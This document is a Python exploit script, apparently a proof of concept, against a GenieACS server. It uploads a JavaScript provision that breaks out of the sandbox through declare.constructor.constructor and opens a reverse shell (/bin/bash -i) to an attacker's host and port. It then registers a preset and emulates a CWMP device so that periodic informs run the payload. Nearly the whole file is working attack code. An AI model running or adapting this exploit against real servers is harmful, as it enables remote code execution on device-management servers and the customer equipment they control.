import random import json import string import requests import base64 import threading import time from xml.etree.ElementTree import Element, SubElement, tostring # Configuration TARGET_IP = "127.0.0.1" # IP of the GenieACS server (e.g. docker host) LHOST_IP = "host.docker.internal" # Your local IP for receiving the reverse shell (e.g. localhost/host.docker.internal) LPORT = 4444 # Your local port for receiving the reverse shell ACS_URL = f"http://{TARGET_IP}:7547/" NBI_URL = f"http://{TARGET_IP}:7557/" def put_provision(name='revshell', LHOST=LHOST_IP, LPORT=LPORT): """Put a provision value into the device""" payload = f""" const global = declare.constructor.constructor('return this')(); const process = global.process; const require = process.mainModule.require; try {{ const net = require('net'); const {{ spawn }} = require('child_process'); // Create connection to attacker const client = new net.Socket(); client.connect('{LPORT}', '{LHOST}', () => {{ // Spawn shell process const shell = spawn('/bin/bash', ['-i']); // Pipe shell I/O to network connection client.pipe(shell.stdin); shell.stdout.pipe(client); shell.stderr.pipe(client); // Handle connection close shell.on('exit', () => client.end()); client.on('error', () => shell.kill()); }}); return {{ status: "Reverse shell initiated", target: `{LHOST}:{LPORT}` }}; }} catch(e) {{ return {{ error: "Reverse shell failed: " + e.message }}; }} """ try: # Send the PUT request url = f"{NBI_URL}/provisions/{name}".replace("//provisions", "/provisions") print(f"URL: {url}") response = requests.put( url, data=payload, timeout=30, ) print(f"Response: {response.text}") except Exception as e: print(f"Error creating GenieACS provision: {e}") def put_preset(preset_name, provision_name='revshell'): """Put a preset value into the device""" payload = { "weight": 0, "channel": preset_name, "events": {"2 PERIODIC": True}, "precondition": "", "configurations": [ {"type": "provision", "name": provision_name, "args": None} ] } try: print(f"Payload: {json.dumps(payload, indent=2)}") # Send the PUT request url = f"{NBI_URL}/presets/{preset_name}".replace("//presets", "/presets") print(f"URL: {url}") response = requests.put( url, json=payload, timeout=30 ) print(f"Response: {response.text}") except Exception as e: print(f"Error creating GenieACS preset: {e}") # SOAP namespaces NAMESPACES = { "soap-enc": "http://schemas.xmlsoap.org/soap/encoding/", "soap-env": "http://schemas.xmlsoap.org/soap/envelope/", "xsd": "http://www.w3.org/2001/XMLSchema", "xsi": "http://www.w3.org/2001/XMLSchema-instance", "cwmp": "urn:dslforum-org:cwmp-1-0" } # Global variables (these would be defined elsewhere in your Python module) next_inform_timeout = None pending_inform = False device = None session = requests.Session() inform_interval = 2 # Periodic inform interval in seconds def start_session(event=None): """ Start a CWMP session by sending an Inform message Args: event (str, optional): The event type for the inform message """ global next_inform_timeout, pending_inform, session # Cancel any existing timeout if next_inform_timeout: next_inform_timeout.cancel() next_inform_timeout = None # Reset session state and clear cookies to avoid 400 Bad Request pending_inform = False session.cookies.clear() print(f"Starting session with event: {event or '0 BOOTSTRAP'}") # Generate random request ID (8 character alphanumeric string) chars = string.ascii_lowercase + string.digits request_id = ''.join(random.choice(chars) for _ in range(8)) # Define callback function for when inform body is ready def inform_callback(body): # Create SOAP XML document with request ID and body xml = create_soap_document(request_id, body) # Define callback for send request response def send_request_callback(response_xml): cpe_request() # Send the request send_request(xml, send_request_callback) # Call methods.inform with device, event, and callback methods.inform(device, event, inform_callback) def create_soap_document(request_id, body): """Create SOAP XML document with proper namespaces""" # Create root envelope with namespaces envelope = Element("soap-env:Envelope") for prefix, uri in NAMESPACES.items(): envelope.set(f"xmlns:{prefix}", uri) # Create header with ID header = SubElement(envelope, "soap-env:Header") id_element = SubElement(header, "cwmp:ID") id_element.set("soap-env:mustUnderstand", "1") id_element.text = request_id # Create body body_element = SubElement(envelope, "soap-env:Body") if body is not None: body_element.append(body) # Convert to string with XML declaration xml_str = tostring(envelope, encoding='unicode') return f'\n{xml_str}' def send_request(xml, callback): """Send HTTP POST request with SOAP XML""" global session # Prepare headers headers = { 'Content-Type': 'text/xml; charset="utf-8"', 'SOAPAction': '""' } try: # Send POST request through proxy response = session.post( ACS_URL, data=xml or "", headers=headers, timeout=30 ) # Check response status response.raise_for_status() # Parse response XML if present response_xml = None if response.content: try: import xml.etree.ElementTree as ET response_xml = ET.fromstring(response.text) except ET.ParseError: response_xml = None # Call callback with parsed XML callback(response_xml) except requests.exceptions.RequestException as e: print(f"HTTP request failed: {e}") # On error, schedule next periodic inform schedule_next_periodic_inform() callback(None) def schedule_next_periodic_inform(): """Schedule the next periodic inform session""" global next_inform_timeout if next_inform_timeout: next_inform_timeout.cancel() next_inform_timeout = threading.Timer(inform_interval, lambda: start_session("2 PERIODIC")) next_inform_timeout.start() print(f"Next periodic inform scheduled in {inform_interval} seconds") def cpe_request(): """Handle CPE request and complete CWMP session""" print("Sending empty request to complete CWMP session...") # Send empty request to complete the session def empty_request_callback(response_xml): print("CWMP session completed") schedule_next_periodic_inform() send_request(None, empty_request_callback) class methods: @staticmethod def inform(device, event, callback): """Create CWMP Inform message""" # Create Inform element inform = Element("cwmp:Inform") # Device ID device_id = SubElement(inform, "DeviceId") # Manufacturer manufacturer = SubElement(device_id, "Manufacturer") manufacturer.text = device.get("Device.DeviceInfo.Manufacturer", ["", "Unknown"])[1] if device else "Unknown" # OUI oui = SubElement(device_id, "OUI") oui.text = device.get("Device.DeviceInfo.ManufacturerOUI", ["", "000000"])[1] if device else "000000" # Product Class product_class = SubElement(device_id, "ProductClass") product_class.text = device.get("Device.DeviceInfo.ProductClass", ["", "CPE"])[1] if device else "CPE" # Serial Number serial_number = SubElement(device_id, "SerialNumber") serial_number.text = device.get("Device.DeviceInfo.SerialNumber", ["", "123456"])[1] if device else "123456" # Event event_struct = SubElement(inform, "Event") event_item = SubElement(event_struct, "EventStruct") event_code = SubElement(event_item, "EventCode") event_code.text = event or "2 PERIODIC" command_key = SubElement(event_item, "CommandKey") command_key.text = "" # Max Envelopes max_envelopes = SubElement(inform, "MaxEnvelopes") max_envelopes.text = "1" # Current Time current_time = SubElement(inform, "CurrentTime") from datetime import datetime current_time.text = datetime.now().isoformat() # Retry Count retry_count = SubElement(inform, "RetryCount") retry_count.text = "0" # Parameter List (empty for now) parameter_list = SubElement(inform, "ParameterList") parameter_list.set("soap-enc:arrayType", "cwmp:ParameterValueStruct[0]") # Call callback with the inform body callback(inform) def stop_periodic_informs(): """Stop periodic inform sessions""" global next_inform_timeout if next_inform_timeout: next_inform_timeout.cancel() next_inform_timeout = None print("Periodic informs stopped") # Example usage if __name__ == "__main__": # Generate random serial number (12 character alphanumeric string) put_provision('revshell', LHOST_IP, LPORT) put_preset("exploit-periodic2",'revshell') chars = string.ascii_uppercase + string.digits random_serial = ''.join(random.choice(chars) for _ in range(12)) # Sample device data structure device = { "Device.DeviceInfo.Manufacturer": ["xsd:string", "DF"], "Device.DeviceInfo.ManufacturerOUI": ["xsd:string", "123456"], "Device.DeviceInfo.ProductClass": ["xsd:string", "Exploit"], "Device.DeviceInfo.SerialNumber": ["xsd:string", random_serial] } print("Starting CWMP session...") print(f"Endpoint: {ACS_URL}") print(f"Device Serial Number: {random_serial}") print(f"Periodic inform interval: {inform_interval} seconds") try: # Start initial session with 2 PERIODIC event start_session("0 BOOTSTRAP") # Keep the program running to allow periodic informs print("Press Ctrl+C to stop periodic informs...") while True: time.sleep(1) except KeyboardInterrupt: print("\nShutting down...") stop_periodic_informs() print("Program terminated")